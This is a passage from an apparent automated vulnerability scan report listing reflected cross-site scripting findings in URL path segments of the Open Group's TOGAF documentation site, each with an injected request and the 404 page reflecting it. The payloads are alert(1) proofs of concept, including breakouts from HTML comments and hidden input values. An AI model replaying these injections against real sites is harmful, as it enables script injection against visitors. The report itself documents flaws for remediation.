<!-- re_url = /architecture71102--><script>alert(1)</script>ab500cf3d8b/togaf8-doc/arch/ -->
...[SNIP]...

3.123. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:08 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4262

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architectureca5d0<script>alert(1)</script>e940eee5ea/togaf8-doc/arch/<br>
...[SNIP]...

3.124. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:28 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc14af3<script>alert(1)</script>b843f19b2cc/arch/<br>
...[SNIP]...

3.125. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:31 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-docb5ef6--><script>alert(1)</script>8fb3022b3ea/arch/ -->
...[SNIP]...

3.126. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Request

GET /architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4264

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3d8ea<script>alert(1)</script>c79ebfc2275/<br>
...[SNIP]...

3.127. http://www.opengroup.org/architecture/togaf8-doc/arch/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=TOGAF
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:56 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 4270

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archfd8d0--><script>alert(1)</script>e0d16d1920c/ -->
...[SNIP]...

3.128. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:26 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture5a499<script>alert(1)</script>2eeeb0b90fa/togaf8-doc/arch/banner1.htm<br>
...[SNIP]...

3.129. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb1689--><script>alert(1)</script>e2a73383cc7/togaf8-doc/arch/banner1.htm -->
...[SNIP]...

3.130. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture80c52"><script>alert(1)</script>f743f40b2e7/togaf8-doc/arch/banner1.htm">
...[SNIP]...

3.131. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doccd353--><script>alert(1)</script>471e5f4a359/arch/banner1.htm -->
...[SNIP]...

3.132. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-docc907b"><script>alert(1)</script>22f08924d21/arch/banner1.htm">
...[SNIP]...

3.133. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc3fff9<script>alert(1)</script>8559c6c8772/arch/banner1.htm<br>
...[SNIP]...

3.134. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm<br>
...[SNIP]...

3.135. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm -->
...[SNIP]...

3.136. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm">
...[SNIP]...

3.137. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4<br>
...[SNIP]...

3.138. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 -->
...[SNIP]...

3.139. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Request

GET /architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73">
...[SNIP]...

3.140. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
